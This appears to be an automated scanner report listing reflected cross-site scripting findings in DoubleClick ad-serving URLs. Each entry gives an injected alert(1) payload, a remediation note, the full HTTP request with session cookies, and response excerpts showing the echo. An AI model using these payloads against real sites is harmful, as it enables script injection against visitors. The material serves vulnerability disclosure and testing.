<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... /250%3B41893241/41911028/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511581%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100f8622"-alert(1)-"e786040c9e9&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox ...[SNIP]...
The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2487f"-alert(1)-"1ded3a37738 was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=2487f"-alert(1)-"1ded3a37738&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... s%3D%3fhttp://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=2487f"-alert(1)-"1ded3a37738&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177?tag=gumballs%3Bimg% ...[SNIP]...
The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ea16"-alert(1)-"a10ba2a89b8 was submitted in the pt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=20008ea16"-alert(1)-"a10ba2a89b8&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... %3B63339400%3B4307-300/250%3B41893241/41911028/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511581%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=20008ea16"-alert(1)-"a10ba2a89b8&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http:/ ...[SNIP]...
The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9546"-alert(1)-"7b77c2ee631 was submitted in the ra parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243a9546"-alert(1)-"7b77c2ee631&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243a9546"-alert(1)-"7b77c2ee631&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177?tag=gumballs%3Bimg%3B2"); var fscUrl = url; var fscUrlClickT ...[SNIP]...
The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17d09"-alert(1)-"5e5c704d50f was submitted in the rqid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB23817d09"-alert(1)-"5e5c704d50f&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... Eokv%3D%3Bpc%3Dcbs511581%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB23817d09"-alert(1)-"5e5c704d50f&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cart ...[SNIP]...
The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9ee8"-alert(1)-"62439e03c07 was submitted in the sg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581c9ee8"-alert(1)-"62439e03c07&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... et/click%3Bh%3Dv8/3af6/17/145/%2a/j%3B240444525%3B0-0%3B0%3B63339400%3B4307-300/250%3B41893241/41911028/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511581%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=7108&sg=511581c9ee8"-alert(1)-"62439e03c07&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6Thqi ...[SNIP]...
The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72f1a"-alert(1)-"8e6667033a8 was submitted in the site parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=672f1a"-alert(1)-"8e6667033a8&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... B0-0%3B0%3B63339400%3B4307-300/250%3B41893241/41911028/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511581%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=672f1a"-alert(1)-"8e6667033a8&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=5 ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload beac5"-alert(1)-"40fb5314426 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108beac5"-alert(1)-"40fb5314426&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... bleclick.net/click%3Bh%3Dv8/3af6/17/145/%2a/j%3B240444525%3B0-0%3B0%3B63339400%3B4307-300/250%3B41893241/41911028/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511581%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=7108beac5"-alert(1)-"40fb5314426&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.24 ...[SNIP]...
The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b85a"-alert(1)-"6cc9e163664 was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.346b85a"-alert(1)-"6cc9e163664&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... =&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.346b85a"-alert(1)-"6cc9e163664&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177?tag=gumballs%3Bimg%3B2"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ...[SNIP]...
The value of the source request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ecdce'%3balert(1)//dd13385a528 was submitted in the source parameter. This input was echoed as ecdce';alert(1)//dd13385a528 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/CBS.LASTFM.US/anonymoushome/anonymoushome/overview;source=ecdce'%3balert(1)//dd13385a528 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.last.fm/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae18c"-alert(1)-"4d9707a94f7 was submitted in the b parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14ae18c"-alert(1)-"4d9707a94f7&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... lick%3Bh%3Dv8/3af6/17/14a/%2a/n%3B239757684%3B0-0%3B0%3B61212126%3B3454-728/90%3B41608334/41626121/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14ae18c"-alert(1)-"4d9707a94f7&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27 ...[SNIP]...
The value of the b request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d1d5'-alert(1)-'3748f2b04a2 was submitted in the b parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=141d1d5'-alert(1)-'3748f2b04a2&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... lick%3Bh%3Dv8/3af6/17/14a/%2a/k%3B239757684%3B1-0%3B0%3B61212126%3B3454-728/90%3B41608435/41626222/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=141d1d5'-alert(1)-'3748f2b04a2&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27 ...[SNIP]...
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10872"-alert(1)-"acdc1d3a658 was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=010872"-alert(1)-"acdc1d3a658&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
